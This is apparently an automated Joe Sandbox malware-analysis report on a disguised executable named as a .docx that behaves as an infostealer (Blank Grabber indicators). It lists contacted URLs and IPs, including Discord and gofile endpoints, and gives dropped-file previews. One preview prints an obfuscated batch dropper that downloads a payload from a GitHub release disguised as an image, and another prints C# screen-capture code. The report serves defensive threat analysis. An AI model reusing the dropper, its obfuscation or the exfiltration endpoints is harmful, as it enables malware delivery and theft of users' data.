https://www.google.com/	chost.exe, 00000011.00000002.2376962492.0000016E18984000.00000004.00001000.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2376962492.0000016E18940000.00000004.00001000.00020000.00000000.sdmp	false
https://www.iqiyi.com/	chost.exe, 00000011.00000002.2376962492.0000016E18940000.00000004.00001000.00020000.00000000.sdmp	false
https://foss.heptapod.net/pypy/pypy/-/issues/3539	chost.exe, 00000011.00000002.2376220344.0000016E181D0000.00000004.00001000.00020000.00000000.sdmp	false
https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.	chost.exe, 00000011.00000002.2372251589.0000016E16E1F000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2069822813.0000016E1767E000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2370070368.0000016E17672000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2245289338.0000016E17672000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2373248659.0000016E17672000.00000004.00000020.00020000.00000000.sdmp	false
http://google.com/	chost.exe, 00000011.00000003.2370358863.0000016E1731D000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2372629701.0000016E1731D000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2060721109.0000016E1731D000.00000004.00000020.00020000.00000000.sdmp	false
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF	chost.exe, 00000011.00000003.2198748954.0000016E17761000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2216947461.0000016E17761000.00000004.00000020.00020000.00000000.sdmp	false
http://ocsp.sectigo.com0	chost.exe, 00000010.00000003.2023655023.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2023679527.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp	false
https://tools.ietf.org/html/rfc7231#section-4.3.6)	chost.exe, 00000011.00000002.2372251589.0000016E16E1F000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2049162957.0000016E17941000.00000004.00000020.00020000.00000000.sdmp	false
https://discordapp.com/api/v9/users/	chost.exe, 00000011.00000002.2372528563.0000016E170B0000.00000004.00001000.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2048510879.0000016E1725D000.00000004.00000020.00020000.00000000.sdmp	false
https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source	chost.exe, 00000011.00000002.2372116588.0000016E16CEC000.00000004.00001000.00020000.00000000.sdmp	false
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	chost.exe, 00000011.00000003.2369122552.0000016E179C1000.00000004.00000020.00020000.00000000.sdmp	false
https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec	chost.exe, 00000011.00000002.2372116588.0000016E16CEC000.00000004.00001000.00020000.00000000.sdmp	false
https://github.com/urllib3/urllib3/issues/2920	chost.exe, 00000011.00000002.2376637980.0000016E18448000.00000004.00001000.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2224232061.0000016E176DD000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2210509318.0000016E176DD000.00000004.00000020.00020000.00000000.sdmp	false
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	chost.exe, 00000011.00000002.2373846136.0000016E178B0000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2367561514.0000016E177E0000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2367561514.0000016E17889000.00000004.00000020.00020000.00000000.sdmp	false
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	chost.exe, 00000010.00000003.2023655023.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2023679527.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp	false
https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data	chost.exe, 00000011.00000002.2371899484.0000016E15457000.00000004.00000020.00020000.00000000.sdmp	false
https://yahoo.com/	chost.exe, 00000011.00000003.2053657547.0000016E176DD000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2370070368.0000016E17586000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2373846136.0000016E178B0000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2247819963.0000016E17585000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2373248659.0000016E17589000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2053657547.0000016E1758D000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2245289338.0000016E17583000.00000004.00000020.00020000.00000000.sdmp	false
https://account.bellmedia.c	chost.exe, 00000011.00000002.2374587736.0000016E17C5A000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2376962492.0000016E189F8000.00000004.00001000.00020000.00000000.sdmp	false
http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6	chost.exe, 00000011.00000002.2373846136.0000016E17961000.00000004.00000020.00020000.00000000.sdmp	false
https://g.live.com/odclientsettings/ProdV2	svchost.exe, 0000000C.00000003.1975407820.00000266524C2000.00000004.00000800.00020000.00000000.sdmp	false
https://login.microsoftonline.com	chost.exe, 00000011.00000002.2374587736.0000016E17C5A000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2376962492.0000016E18974000.00000004.00001000.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2376962492.0000016E18A00000.00000004.00001000.00020000.00000000.sdmp	false
http://crl.thawte.com/ThawteTimestampingCA.crl0	chost.exe, 00000010.00000003.2023655023.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp	false
https://html.spec.whatwg.org/multipage/	chost.exe, 00000011.00000002.2373846136.0000016E17900000.00000004.00000020.00020000.00000000.sdmp	false
https://www.ifeng.com/	chost.exe, 00000011.00000002.2376962492.0000016E18940000.00000004.00001000.00020000.00000000.sdmp	false
https://media.discordapp.net/attachments/1267176354575683617/1314299600026468442/Blank-user.rar?ex=	chost.exe, 00000011.00000002.2375978136.0000016E17EE2000.00000004.00000020.00020000.00000000.sdmp	false
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings	chost.exe, 00000011.00000002.2376220344.0000016E181D0000.00000004.00001000.00020000.00000000.sdmp	false
https://www.zhihu.com/	chost.exe, 00000011.00000002.2376962492.0000016E18984000.00000004.00001000.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2376962492.0000016E189A4000.00000004.00001000.00020000.00000000.sdmp	false
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	chost.exe, 00000011.00000003.2368767650.0000016E177BB000.00000004.00000020.00020000.00000000.sdmp	false
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	chost.exe, 00000011.00000003.2369122552.0000016E179C1000.00000004.00000020.00020000.00000000.sdmp	false
https://www.rfc-editor.org/rfc/rfc8259#section-8.1	chost.exe, 00000011.00000003.2370070368.0000016E17586000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2247819963.0000016E17585000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2373248659.0000016E17589000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2053657547.0000016E1758D000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2245289338.0000016E17583000.00000004.00000020.00020000.00000000.sdmp	false
https://api.gofile.io/getServer	chost.exe, 00000011.00000002.2373027155.0000016E173B0000.00000004.00001000.00020000.00000000.sdmp	false
https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png	chost.exe, 00000011.00000002.2372251589.0000016E16DBA000.00000004.00000020.00020000.00000000.sdmp	false
https://sectigo.com/CPS0	chost.exe, 00000010.00000003.2023655023.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000010.00000003.2023679527.0000025C3C153000.00000004.00000020.00020000.00000000.sdmp	false

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	true
162.159.138.232	discord.com	United States	13335	CLOUDFLARENETUS	false
185.199.109.133	objects.githubusercontent.com	Netherlands	54113	FASTLYUS	false
20.233.83.145	github.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1569492
Start date and time:	2024-12-05 19:35:22 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 13m 8s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	123
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Cooperative Agreement0000800380.docx.exe
Detection:	MAL
Classification:	mal100.rans.troj.adwa.spyw.expl.evad.winEXE@188/104@6/5
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 84% Number of executed functions: 122 Number of non-executed functions: 191
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, RuntimeBroker.exe, SIHClient.exe, Microsoft.Photos.exe, WmiPrvSE.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 23.218.208.109, 172.217.17.35
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, gstatic.com, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target mshta.exe, PID 7408 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 7320 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7416 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Cooperative Agreement0000800380.docx.exe

Simulations

Behavior and APIs

Time	Type	Description
13:36:13	API Interceptor	238x Sleep call for process: powershell.exe modified
13:36:42	API Interceptor	1x Sleep call for process: dllhost.exe modified
13:36:43	API Interceptor	2x Sleep call for process: svchost.exe modified
13:36:53	API Interceptor	4x Sleep call for process: WMIC.exe modified
13:36:55	API Interceptor	1781x Sleep call for process: Cooperative Agreement0000800380.docx.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
discord.com	https___files.catbox.moe_l2rczc.pif.exe	Get hash	malicious	Unknown	Browse	162.159.135.232
	VzhY4BcvBH.exe	Get hash	malicious	AsyncRAT, RedLine, StormKitty, VenomRAT	Browse	162.159.136.232
	5QnwxSJVyX.doc	Get hash	malicious	Unknown	Browse	162.159.136.232
	speedymaqing.exe	Get hash	malicious	Python Stealer, Discord Token Stealer	Browse	162.159.138.232
	main.exe	Get hash	malicious	Blank Grabber, SilentXMRMiner, Xmrig	Browse	162.159.135.232
	EsgeCzT4do.exe	Get hash	malicious	XWorm	Browse	162.159.137.232
	cmd.exe	Get hash	malicious	Blank Grabber	Browse	162.159.128.233
	spacers.exe	Get hash	malicious	Unknown	Browse	162.159.138.232
	EternalPredictor.exe	Get hash	malicious	Blank Grabber, Skuld Stealer, XWorm	Browse	162.159.128.233
	program.exe	Get hash	malicious	Blank Grabber	Browse	162.159.137.232
github.com	1.exe	Get hash	malicious	Havoc, RUSTDESK	Browse	20.233.83.145
	Ttok18.exe	Get hash	malicious	Vidar	Browse	20.233.83.145
	https://github.com/kernelwernel/VMAware/releases/download/v1.9/vmaware64.exe	Get hash	malicious	Unknown	Browse	20.233.83.145
	SplpM1fFkV.exe	Get hash	malicious	Unknown	Browse	20.233.83.145
	PO24002292.jar	Get hash	malicious	Caesium Obfuscator, STRRAT	Browse	140.82.121.4
	TikTokDesktop18.exe	Get hash	malicious	Stealc, Vidar	Browse	20.233.83.145
	TTDesktop18.exe	Get hash	malicious	Stealc, Vidar	Browse	20.233.83.145
	TTDesktop18.exe	Get hash	malicious	Stealc, Vidar	Browse	20.233.83.145
	TT18.exe	Get hash	malicious	Stealc, Vidar	Browse	20.233.83.145
	Loader.exe	Get hash	malicious	LummaC Stealer	Browse	20.233.83.145

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	1.307370913155731
Encrypted:	false
SSDEEP:	3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvr1:KooCEYhgYEL0In
MD5:	68F35C20406BBD345DE5508C12E7519D
SHA1:	95746A210C2029861D8399B75C15B476729733C1
SHA-256:	56640503ABED889CD82BD19239EF77A44B2580FB4702DAEE74349BD55101C62C
SHA-512:	BA88FEBEE0ED5F7783FD6F95829793E0F5C7714FA50C3AD7587D1E1F848B494C132D67D3C11751104324A2EF47E11DE370B62F370BDE77D3ED48FC40AC8A3331
Malicious:	false
Reputation:	unknown
Preview:	z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x296fc99a, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.42217932375075845
Encrypted:	false
SSDEEP:	1536:xSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:xaza/vMUM2Uvz7DO
MD5:	12F6093515D0F2C96757837E3506BBED
SHA1:	94445289B5C1E46D98A9F364D204CA88DACD71D9
SHA-256:	3F23FBC809559913F405B8479D17006660D97901138BA063643CEEE15C6083EE
SHA-512:	B2F5323DF5DF70E4327FE132AE7AC22BC4A498236BE2D7D90B0293F2FE843A872910377C0D3E3909813574EB150682741D261B2C2BCED2603424E90A303D9944
Malicious:	false
Reputation:	unknown
Preview:	)o.... .......A.......X\...;...{......................0.!..........{A.+$...\|..h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{.....................................I+$...\|......................+$...\|...........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.07727674232503987
Encrypted:	false
SSDEEP:	3:Rum//EYe5WpZ90hajn13a/PZ3g3m/lllollcVO/lnlZMxZNQl:IW/Ez5WpZOha53qPumtAOewk
MD5:	C721FE4F9144BF210391E2AC51317D2E
SHA1:	05511C4C2435A8D7D49C025620D24F4D9B82ADF2
SHA-256:	8461E6484E733E6247481933B3C2CE88C429DDC12280A19EE7714D1A5E324D3A
SHA-512:	A75EA3ABCEE08097BCB6E6B22A5A30B9A1BC50F0A122C4452E63297335D54B64A4DA9348961961A26CE97532218C524B3E7BB62F0DD4C741E1C901D568422829
Malicious:	false
Reputation:	unknown
Preview:	.TX......................................;...{..+$...\|.......{A..............{A......{A..........{A]....................+$...\|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	9434
Entropy (8bit):	4.928515784730612
Encrypted:	false
SSDEEP:	192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
MD5:	D3594118838EF8580975DDA877E44DEB
SHA1:	0ACABEA9B50CA74E6EBAE326251253BAF2E53371
SHA-256:	456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
SHA-512:	103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
Malicious:	false
Reputation:	unknown
Preview:	PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Reputation:	unknown
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Packages\Microsoft.WindowsCalculator_8wekyb3d8bbwe\Settings\settings.dat

Download File

Process:	C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.729480972450828
Encrypted:	false
SSDEEP:	24:1E44WxsvnOClDuUbwB7cKRSh/+wB77IoadnW/6ZPo:TJxMOW87yb7I
MD5:	F8683ADC6735282FAED16AEB36094838
SHA1:	0BDFCE41AB6782F2F08EA0DD42F1E9155BF53F96
SHA-256:	0DCB447D775D19AA301C04A00F696F28214392424629B7083227F9AF3A56B786
SHA-512:	4E47C880825E45B31910D2B6307F3011F97F44965559CA5D4879B01E3C37F5422344DC2C1705C0811C1B780FD7F634B1DCE99C615E7F804B8B2F133A9C0A7729
Malicious:	false
Reputation:	unknown
Preview:	regf........b.Q.7.................. ...........y.b.3.d.8.b.b.w.e.\.S.e.t.t.i.n.g.s.\.s.e.t.t.i.n.g.s...d.a.t...y..j.....J.....y..j.....J.........z..j.....J.....rmtm..k.DG..............................................................................................................................................................................................................................................................................................................................................Q\.7........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Packages\Microsoft.WindowsCalculator_8wekyb3d8bbwe\Settings\settings.dat.LOG1

Download File

Process:	C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.7655891117783291
Encrypted:	false
SSDEEP:	24:6e44Wxs9Y7nOClDuUbwB7cKRSh/+wB77IoadnW/6ZPo:IJxfjOW87yb7I
MD5:	E9778DD00FCFA6F9817631932902451E
SHA1:	12DDABEF6F50776423B361DE7160203889B5E3FC
SHA-256:	DA44C445FE892C28C50EAB9442FBAB3CB95FF1F37A7EC887029AA5900337982B
SHA-512:	35529A6B8F55A1E7E785C590A1302EED2D8C51231E5B99C318FB9941C5E90B731D8073348492BDE31857D6218F790CFC9C868CDEFDF270BFE0194ED47682349C
Malicious:	false
Reputation:	unknown
Preview:	regf........b.Q.7.................. ...........y.b.3.d.8.b.b.w.e.\.S.e.t.t.i.n.g.s.\.s.e.t.t.i.n.g.s...d.a.t...y..j.....J.....y..j.....J.........z..j.....J.....rmtm..k.DG..............................................................................................................................................................................................................................................................................................................................................V\.7HvLE....................T....>.i.i.i............hbin................b.Q.7..........nk,.T...7..................................x...............................Test....p...sk..h...h.......t.......H...X.............4.........?.......................?....................... ... ...............YQ..fr]%dc;.............vk......0...........VeryFirstLaunch......7ri.DG.................vk................y Mode....p...sk..x...x.......t.......H...X.............4.........?.......................

C:\Users\user\AppData\Local\Temp\4713.tmp\4714.tmp\4715.bat

Download File

Process:	C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe
File Type:	Non-ISO extended-ASCII text, with very long lines (980), with CRLF, LF, NEL line terminators
Category:	dropped
Size (bytes):	2636
Entropy (8bit):	4.259545646983714
Encrypted:	false
SSDEEP:	24:40DYNjj78/lq5ilD33vwojjSPm5liobH3BX12LyvUt:4Uojv8/lPwoj0KBX12LyvO
MD5:	4C30B3F2F6E2670F27B4BE93E5B1A2AD
SHA1:	161C5C33915619EF490CB8270A373BC714AC51E7
SHA-256:	F1ACC66501F9392E887B25117664F69EBA557C8383764CEB743432F085E1D14C
SHA-512:	89B27C81A7E577115FE8D958F44F64893BC49AB9506E6F841AA5E4E1A7182D762F3DE6622AE6D4518E3C11D44CCEC325373AFCBFFDFF2F900CA35D38A2511297
Malicious:	false
Reputation:	unknown
Preview:	@shift /0....&@cls&@set "....=vyqGKXL5F8RHnMrUouZV4@BCADpegiOWNxQzbPd9 jcw703as1lm6fhIkS2EYtTJ"..%....:~42,1%%....:~38,1%%....:~40,1%%TEMP%....%....:~26,1%%....:~16,1%%....:~43,1%%....:~27,1%%....:~14,1%%....:~48,1%%....:~54,1%%....:~27,1%%....:~50,1%%....:~50,1%%....:~40,1%-%....:~31,1%%....:~29,1%%....:~12,1%%....:~38,1%%....:~16,1%%....:~43,1%%....:~57,1%%....:~61,1%%....:~1,1%%....:~50,1%%....:~27,1%%....:~40,1%%l..x..%%....:~11,1%%....:~29,1%%....:~38,1%%....:~38,1%%....:~27,1%%....:~12,1%%....:~40,1%-%....:~23,1%%....:~16,1%%..V.I.%%....:~51,1%%....:~51,1%%....:~47,1%%....:~12,1%%....:~38,1%%....:~40,1%"%....:~55,1%%....:~12,1%%.a.f...%%....:~0,1%%....:~16,1%%....:~56,1%%....:~27,1%-%....:~31,1%%....:~27,1%%....:~36,1%%....:~10,1%%....:~27,1%%....:~2,1%%....:~17,1%%....:~27,1%%....:~48,1%%....:~61,1%%....:~40,1%'%....:~54,1%%....:~61,1%%....:~61,1%%....:~26,1%%....:~48,1%://github.com/newpro008/scan0052p/releases/download/secure_prj00/scan000373.jpg/'%....:~40,1%-%....:~16,1%%F

C:\Users\user\AppData\Local\Temp\4z11l1tq\4z11l1tq.0.cs

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1004
Entropy (8bit):	4.154581034278981
Encrypted:	false
SSDEEP:	24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
MD5:	C76055A0388B713A1EABE16130684DC3
SHA1:	EE11E84CF41D8A43340F7102E17660072906C402
SHA-256:	8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
SHA-512:	22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
Malicious:	false
Reputation:	unknown
Preview:	.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..

C:\Users\user\AppData\Local\Temp\4z11l1tq\4z11l1tq.cmdline

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (604), with no line terminators
Category:	dropped
Size (bytes):	607
Entropy (8bit):	5.350246934047182
Encrypted:	false
SSDEEP:	12:p37Lvkmb6KOkqe1xBkrk+ikOfN/CWZEifN/H:V3ka6KOkqeFkOfNrEifNv
MD5:	D8204B138C4BAC576E900B56D8062FE7
SHA1:	B34AE2411C2E328AF68CB52D4184107C102BE27D
SHA-256:	53F5920F3AD63A4CD82D0169EFC7ACA75571EB2A694518309671B53657E7F341
SHA-512:	A9F2D138F7C454BE3ADDE03D04E15FF187986E485483D86144CCDE2EBDB8B6E49F950AD6E0F898773C5886CFEC0C9A328122CFE042DE6AA9DC3F400D8709018A
Malicious:	true
Reputation:	unknown
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\4z11l1tq\4z11l1tq.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\4z11l1tq\4z11l1tq.0.cs"

C:\Users\user\AppData\Local\Temp\4z11l1tq\4z11l1tq.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	3.1602919862711967
Encrypted:	false
SSDEEP:	48:6O7oEAtf0KhzBU/Gf6mtJ75N0Wz+pW1ul6a3+q:6Nz05mz5OWz0MK
MD5:	145F0C214FA74A055A8B056D642293DA
SHA1:	DF658CF4562017EA07E77DF9E71DEFD275D8E2C3
SHA-256:	05770DDA8D7D856D13588D04F444D7086858716F005C739A39EB3C8FFFA5D145
SHA-512:	5B18FE17F38DB69BFB1113901A125E044622A36983F956E796CCA9BFB73C034C048B388C7FFCB83D4FF421C526AD78A8C07EE52F71DB9B22867C44054A064950
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0.Rg...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......<!...............................................................0..........s.....(...........8...........o.......(......(....s........(..........(......(....s....~......(....o........,...o........o....t....o........,...o.......&.....X.......i?k.......(....B.(j........9.Q...........{.........(....BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob...........G.........%3............................................

C:\Users\user\AppData\Local\Temp\4z11l1tq\4z11l1tq.out

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (708), with CRLF, CR line terminators
Category:	modified
Size (bytes):	1149
Entropy (8bit):	5.518013944375424
Encrypted:	false
SSDEEP:	24:KJfrxId3ka6KOkqeFkOfNrEifNWKax5DqBVKVrdFAMBJTH:uFkka6NkqeFkyNrEuNWK2DcVKdBJj
MD5:	4950C8B2BCF60D52AEF4D70DF987EFDE
SHA1:	8668F034748FAEBE2D44EB41A787C51BA540E98F
SHA-256:	467B25A63DC9B10E842C822B3752A1966DEB3F275B900C37CDE9B7D636C9ADE5
SHA-512:	2F99140537C73C1718DAE3B0E6185B51CCC7497C178F5D85BFCEBD0AC4C81D7A0FD1C04B615275D406884DA5FD20407B1841543CC4EF5FD55E547ACB90943102
Malicious:	false
